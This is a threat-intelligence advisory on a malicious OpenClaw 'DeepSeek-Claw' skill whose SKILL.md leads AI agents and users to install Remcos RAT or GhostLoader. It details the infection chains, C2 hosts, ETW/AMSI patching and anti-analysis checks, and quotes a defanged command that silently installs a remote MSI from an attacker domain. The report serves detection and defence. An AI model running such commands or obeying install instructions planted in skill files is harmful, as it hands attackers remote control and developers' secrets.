【CyCraft Monthly Intelligence】Exploiting OpenClaw: Analysis and Mitigation for DeepSeek-Claw Malicious Activities

‍

Threat and Impact

In March 2026, Zscaler ThreatLabz discovered a malicious campaign where attackers abused the skill architecture of the OpenClaw framework to distribute malware via a fraudulent "DeepSeek-Claw" skill. OpenClaw is an autonomous AI Agent designed to execute complex tasks with elevated local privileges. Attackers exploit this trust model by embedding deceptive installation instructions within the skill's Markdown files, tricking both the AI Agent and human users into executing malicious commands that appear legitimate.

‍

Analyst Perspective

This type of attack poses the highest risk to industries that adopt AI Agent workflows and rely heavily on development operations, particularly the technology and financial sectors. Developer workstations are high-value targets, as they typically hold privileged credentials, source code access, deployment secrets, and cloud authentication data. Even if the initial infection affects only a single user or one AI-assisted workflow, stolen data can expose vast corporate infrastructure and software supply chains.

‍

Incident Description

The attackers design two primary malware paths based on the platform and execution flow:

On Windows systems, the malicious skill installs the Remcos Remote Access Trojan (RAT), granting attackers persistent remote control over infected systems.

On macOS, Linux, and during certain manual installations, attackers deploy GhostLoader, a cross-platform Infostealer specializing in harvesting sensitive data from developer environments. This dual-path design makes the campaign particularly dangerous, as it allows attackers to target diverse systems while tailoring the malicious payload to the victim's specific environment.

The core threat of this incident lies in the weaponization of trusted AI and developer workflows. Instead of exploiting traditional software vulnerabilities or CVEs, attackers abuse the public's trust in third-party skills, installation scripts, and autonomous Agent behaviors. This impact extends beyond OpenClaw itself, demonstrating that the AI Agent ecosystem—including plugin models, GitHub-hosted projects, npm-based installation mechanisms, and developer tools—can serve as effective initial access vectors when users or autonomous systems execute unverified instructions.

The consequences can be severe. In the Windows infection chain, the Remcos RAT enables remote command execution and continuous monitoring, including keylogging, clipboard capturing, and browser session Cookie theft, which allows attackers to bypass MFA by hijacking active sessions. In the GhostLoader path, attackers can harvest high-value secrets such as macOS Keychain data, SSH keys, cryptocurrency wallets, and cloud API tokens. These present immediate and long-term risks, including account compromise, cloud abuse, financial theft, lateral movement, and persistent access to the development environment.

Overall, this incident highlights a growing trend: attackers are increasingly targeting AI automation, software development, and third-party extension processes. By transforming seemingly legitimate AI skills into delivery mechanisms for RATs and Infostealers, malicious actors can cause catastrophic consequences for organizations relying on autonomous tools and the modern developer ecosystem.

‍

Technical Details

The defining technical characteristic of this attack is that the adversaries do not exploit traditional software vulnerabilities; instead, they inject malicious instructions into a trusted third-party skill, relying on the fact that users or AI Agents execute the installation steps in SKILL.md by default without further verification.

Reconnaissance

In designing this campaign, the attackers clearly target developers using the OpenClaw framework and AI Agent users. By publishing a fraudulent skill associated with DeepSeek, the threat actors place the malware where highly technical users and AI Agents could easily acquire and execute it.

Once a system is compromised, the malware collects information critical for subsequent operations. Depending on the infection chain branch, its targets include:

• Browser session cookies in local SQLite repositories
• macOS Keychain data
• SSH private keys
• Cryptocurrency wallet data
• Cloud API tokens
• User credentials harvested via fake sudo prompts
• Keystrokes and clipboard contents

These actions indicate that the attackers are not only stealing data of immediate value but are also gathering credentials and tokens to sustain long-term access.

Source Development

To support the operation, threat actors establish delivery and C2 infrastructures, including:

• A malicious GitHub repository hosting the deceptive OpenClaw skill.
• Remote MSI download locations, such as cloudcraftshub[.]com/api and dropras[.]xyz.
• C2 and exfiltration infrastructures, including 146[.]19.24[.]131:2404 for Remcos and trackpipe[.]dev for GhostLoader.

The attackers also stage several malicious payload components in advance, including MSI packages, a malicious g2m.dll, and an obfuscated Node.js installer chain.

Initial Access

Initial access occurs when a user or AI Agent downloads or clones the fraudulent "DeepSeek-Claw" repository and processes its SKILL.md file as a legitimate configuration guide. The key technique here is embedding malicious installation instructions into a seemingly trustworthy yet malicious OpenClaw skill.

On Windows systems, the malicious Markdown file contains commands similar to cmd /c start msiexec /q /i hxxps://cloudcraftshub[.]com/api & rem DeepSeek Claw. This is critical because OpenClaw is designed to serve AI Agents operating with elevated local privileges. Consequently, the attackers do not need a traditional exploit; they simply require the AI Agent or user to trust and execute the provided setup instructions.

Execution

Execution mechanisms vary significantly based on the platform and workflow.

The Windows Remcos Path

The Windows infection chain initiates via:

• cmd /c to launch the command interpreter.
• msiexec /q /i to silently install a remote MSI package.
• Execution of the MSI-delivered files.

The MSI package contains:

• G2M.exe, a legitimately code-signed GoToMeeting executable.
• g2m.dll, a malicious DLL file.

When G2M.exe runs, it loads the malicious g2m.dll from the local directory instead of the legitimate dependency. This DLL then functions as an in-memory shellcode loader responsible for decrypting and executing the Remcos malware payload.

The GhostLoader Path

In the other infection path, the malicious instructions utilize:

• install.sh
• npm install
• npm lifecycle scripts
• An obfuscated Node.js malicious payload named setup.js.

This path abuses standard developing workflows. The Bash installer calls npm scripts, which subsequently execute a hidden JavaScript malicious payload to deploy GhostLoader.

Persistence

Regarding persistence, the strongest evidence in the report comes from the Remcos configuration file, which indicates support for auto-execution via Windows Registry startup mechanisms. It establishes persistence by adding a startup registry key under: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

The RAT's persistence provides adversaries with continuous access through the C2 channel. Furthermore, DLL side-loading via G2M.exe ensures a stable and covert execution of malware under the disguise of a trusted application.

Defense Evasion

Defense evasion is one of the most technically mature aspects of the Windows infection chain.

Abuse of Trusted Binaries and DLL Side-Loading

The attackers exploit the legitimately signed executable G2M.exe to load a malicious DLL via DLL search-order hijacking. This blends the execution process into a trusted process, reducing the likelihood of immediate detection by security systems.

ETW and AMSI Patching

The shellcode loader actively disables Windows security monitoring in memory:

• ETW Patching: It locates ntdll!EtwEventWrite and overwrites its prologue to force an immediate return, effectively suppressing event logging related to process and thread activity.
• AMSI Patching: It modifies amsi!AmsiScanBuffer to force the scan to return AMSI_RESULT_CLEAN, preventing AMSI-aware security tools from flagging the decrypted malicious payload as a threat.

Obfuscation and Encrypted Payload Handling

The loader employs multiple methods to conceal its capabilities, complicating static analysis and signature-based detection:

• Dynamically resolving APIs by parsing the PEB (Process Environment Block) rather than utilizing standard API imports.
• Utilizing XOR-based string decryption at runtime to reconstruct API names and other strings.
• Adopting the TEA (Tiny Encryption Algorithm) in CBC mode with a 128-bit key to protect the embedded Remcos payload prior to execution.

Anti-Debugging and Anti-Sandboxing Checks

Before executing the malicious payload, the loader performs several environment checks:

• Inspecting PEB fields such as BeingDebugged and NtGlobalFlag.
• Timing the execution of Sleep(100) to detect sandbox time-acceleration mechanisms.
• Measuring the execution time of RegOpenKeyExA to identify debugger or hypervisor interference.
• Scanning its own memory for 0xCC software breakpoints.
• Enumerating running processes such as ida.exe, x64dbg.exe, procmon.exe, procexp.exe, processhacker.exe, sysmon.exe, wireshark.exe, fiddler.exe, and vmtoolsd.exe.
• Using OpenMutexA to check for mutexes associated with VMware, VirtualBox, and Sandboxie.

If any analysis or virtualization indicators are discovered, the loader terminates immediately.

The GhostLoader path similarly employs defense evasion; its primary evasion characteristic is embedding a heavily obfuscated Node.js payload within npm lifecycle execution, allowing malicious activity to blend into the normal behavior of development tools.

Discovery

Prior to full execution, the Windows loader conducts extensive local environment discovery, primarily to determine if it is under analysis, including:

• Read PEB flags (e.g., BeingDebugged, NtGlobalFlag)
• Execute timing checks on Sleep(100) and RegOpenKeyExA
• Scan memory for 0xCC breakpoints
• Enumerate processes related to reverse engineering and monitoring tools
• Check virtualization/sandbox-related mutexes.

While these checks are intended for anti-analysis, they function as discovery mechanisms that map the host environment before proceeding.

Data Collection

Post-execution, the malware harvests a broad spectrum of sensitive data.

Remcos Data Collection

• Keystrokes
• Clipboard contents
• Browser session cookies in local SQLite databases: Stealing cookies is particularly critical as it allows attackers to directly hijack active sessions and bypass MFA, completely eliminating the need for the victim's password.

GhostLoader Data Collection

• macOS Keychain information
• SSH keys
• Cryptocurrency wallets
• Cloud API tokens

From these collection behaviors, it is highly inferred that the attackers are interested not only in immediate financial theft but also in gaining unauthorized access to development or cloud environments.

Command and Control (C2)

Remcos establishes a TLS-encrypted TCP C2 channel, providing operators with an interactive reverse shell to execute arbitrary commands on the victim host. The sample configuration points to:

• 146[.]19.24[.]131:2404

The Remcos configuration also reveals short connection timeout settings, facilitating rapid beaconing and interactive operator responses.

GhostLoader utilizes an independent attacker-controlled server for data exfiltration and control, identified as:

• trackpipe[.]dev

In both cases, web-based or TLS communication allows the malware to blend into normal outbound traffic patterns.

Exfiltration

Exfiltration is conducted via attacker-controlled network channels:

• Remcos exfiltrates captured keystrokes, clipboard data, and browser cookies through its TLS-protected C2 connection.
• GhostLoader transmits harvested credentials and developer secrets (including Keychain items, SSH keys, wallet data, and API tokens) to its remote server.

Utilizing encrypted or application-layer network tunnels minimizes the visibility of stolen content during transit.

Impact

The primary impact of this campaign is sensitive data exfiltration; however, several technical impacts on the system itself are noteworthy:

• ETW patching disrupts host telemetry and blinds defenders.
• AMSI patching compromises the scanning efficacy of local antivirus software.
• Remcos operates in a "stealth" persistence mode.
• Potential startup registry modifications alter system behavior to maintain unauthorized malware access.

Beyond local system modifications, the real-world impact is catastrophic. Attackers gain persistent remote access, steal authentication artifacts, and can potentially leverage compromised cookies, keys, and tokens to access downstream services, developer infrastructure, and cloud resources.

In summary, this incident succeeds by embedding attacker-controlled installation logic within a trusted automated workflow via a malicious OpenClaw skill. Once executed, the logic branches into two distinct chains: a Windows MSI and signed-binary side-loading path culminating in an in-memory Remcos RAT chain, and a cross-platform Bash, npm, or Node.js path leading to GhostLoader. This combination of abusing trusted workflows, proxying execution via signed binaries, decrypting payloads in memory, suppressing telemetry, and harvesting credentials renders this campaign technically effective and challenging to detect in its early stages.

‍

Mitigation

Because this campaign weaponizes trusted AI Agents and developer workflows rather than exploiting a single software vulnerability, mitigation efforts must focus on managing third-party skills, restricting high-risk execution paths, hardening developer endpoints, and monitoring for the specific behaviors used across the infection chain.

1. Strict Trust Control and Vetting of Third-Party OpenClaw Skills and Plugins

The primary mitigation noted in the report is that third-party plugins or skills must be thoroughly reviewed and subjected to stringent behavioral monitoring before use. In practice, this requires organizations to:

• Restrict the usage of OpenClaw skills within corporate environments to exclusively approved and vetted repositories.
• Inspect repositories—specifically SKILL.md, installation guides, shell scripts, and package metadata—for:
  • Hidden installation commands
  • Remotely fetched msiexec calls
  • install.sh executions
  • npm install side effects
  • Lifecycle scripts launching obfuscated JavaScript payloads
• Treat AI-agent-readable configuration instructions as untrusted content rather than inherently safe automation flows.
• Enforce provenance checks on skills hosted on GitHub, exercising caution with newly created, low-reputation, or look-alike repositories.
• Impacted Services or Configurations: OpenClaw skill ingestion, internal plugin vetting workflows, GitHub/repository access policies, and AI Agent automation settings that permit autonomous command execution.

2. Preventing the Autonomous Execution of Installation Instructions

This campaign relies on the AI Agent or user executing the commands embedded within the malicious skill. Organizations should lower this risk by:

• Disable or restrict the ability to automatically execute setup instructions directly from Markdown or skill documentation files.
• Require human-in-the-loop approval before an AI Agent runs commands such as:
  • PowerShell one-liners
  • cmd /c
  • msiexec /q /i
  • Shell installers (e.g., install.sh)
  • npm install when lifecycle scripts are present
• Block or alert remote MSI installations initiated from URLs.
• Constrain the local privilege boundaries under which the AI Agent operates.

This is critical because OpenClaw workflows may run with elevated local permissions, magnifying the impact of malicious instructions.

• Impacted Services or Configurations: AI Agent execution policies, endpoint application control, PowerShell policies, Windows Installer controls, shell execution restrictions, and CI/developer automation guardrails.

3. Hardening Developer Workstations and Build Environments

The GhostLoader path specifically targets developer environments to steal secrets like SSH keys, cloud API tokens, browser cookies, and macOS Keychain data. Recommended hardening steps include:

• Enforce the principle of least privilege on developer workstations.
• Restrict local administrator and sudo access.
• Secure the use of Node.js and npm, including restricting the execution of arbitrary or unnecessary lifecycle scripts.
• Protect sensitive developer assets, including:
  • SSH keys
  • Cloud credentials and API tokens
  • Browser-stored sessions
  • macOS Keychain contents
  • Cryptocurrency wallets (if applicable)
• Train users to recognize and reject fraudulent sudo or password prompts.
• Impacted Services or Configurations: macOS Keychain access, SSH tooling, cloud credential storage, npm and Node.js configurations, Linux/macOS shell environments, and browser session storage.

4. Monitoring for Campaign-Specific Execution and Evasion Behaviors

Because this threat uses legitimate tools and signed binaries, behavioral detection is vital. Defenders should monitor for:

• msiexec.exe installing software from remote URLs.
• Suspicious command chains involving:
  • cmd /c
  • PowerShell download-and-execute patterns
  • bash install.sh
  • npm install
  • npm lifecycles executing setup.js
• The abuse of signed binaries, such as GoToMeeting's G2M.exe loading an unexpected g2m.dll.
• DLL side-loading and anomalous module loading paths.
• In-memory tampering directed at:
  • ntdll!EtwEventWrite
  • amsi!AmsiScanBuffer
• Anti-analysis behaviors, including debugger checks, virtual machine checks, and timing-based sandbox evasion techniques.
• Outbound connections to known campaign infrastructure and suspicious, encrypted C2 traffic.
• Impacted Services or Configurations: EDR/XDR telemetry, SIEM detections, sandboxing, Windows module load monitoring, AMSI and ETW integrity monitoring, network security controls, and DNS/web filtering.

5. Blocking Known Infrastructure and Proactive Threat Hunting

Organizations should proactively block and investigate indicators associated with this campaign, including the malicious repositories, download URLs, and C2 infrastructure listed in the report. This prevents initial infections and halts post-compromise outbound communications.

Defenders should actively hunt for signs of:

• Clone or download of the malicious deepseek-claw repository or its variants.
• Remote MSI retrieval from the identified URLs.
• Connections to Remcos and GhostLoader infrastructure.
• The appearance of dropped files such as G2M.exe and g2m.dll.
• Browser cookie theft, keylogging activity, and suspicious access to developer secrets.
• Impacted Services or Configurations: Web proxies, firewalls, DNS filtering, GitHub access monitoring, endpoint file integrity monitoring, and threat hunting workflows.

6. Incident Preparedness for Credential and Secret Exfiltration

Given the malware’s capabilities to harvest browser session cookies, SSH keys, cloud API tokens, credentials, and Keychain data, organizations must assume that a compromised host necessitates an extensive recovery operation. In cases of suspected compromise:

• Rotate SSH keys.
• Revoke and re-issue cloud API tokens.
• Invalidate browser sessions and cookies.
• Reset affected passwords and credentials.
• Audit MFA-protected services for evidence of session hijacking.
• Re-image severely impacted systems where necessary.

This is particularly important because stolen session cookies can allow attackers to bypass MFA entirely without needing to enter the user's password.

• Impacted Services or Configurations: IAM platforms, cloud accounts, SSH infrastructure, browser-based SSO sessions, API credential vaults, and certificate/key management processes.

Ultimately, the most effective mitigation is not a single patch, but a combination of skill vetting, execution restrictions, developer environment hardening, behavioral-based detection, and rapid secret rotation once a system is suspected of compromise.

Reference

•         Malicious OpenClaw Skill Distributes Remcos RAT and GhostLoader

•         惡意 OpenClaw 技能套件被用於散布 Remcos 與 GhostLoader

•         Malicious OpenClaw skill spreads Remcos RAT & GhostLoader

‍

IoCs (Indicator ofCompromise)

Network IoC Analysis

This batch of IoCs perfectly validates the "developer-targeted" and "Remcos RAT" characteristics mentioned in the report, highlighting three key insights:

1. Explicit Association with Remcos RAT: The IP address 146.19.24.131 and the domain trackpipe.dev are explicitly flagged in threat intelligence databases (such as ThreatFox) as C2 servers for win.remcos, directly corroborating the Windows infection path described in the text. Furthermore, the IP leaves port 3389 (RDP) open, which aligns with standard remote control behaviors.
2. Deceptive Naming Tailored to Developers: Domains like cloudcraftshub.com and the use of the developer-centric Top-Level Domain (TLD) trackpipe.dev masquerade as legitimate cloud development tools. This clever branding is highly effective at lowering the guard of both developers and AI Agents, successfully inducing them to execute the installation.
3. Abuse of CDNs for Evasion: These malicious domains are entirely hidden behind Cloudflare services. By leveraging a legitimate CDN to camouflage malicious traffic, the adversaries significantly increase the difficulty for defenders trying to trace and uncover their true backend infrastructure.

Files

Others

‍

‍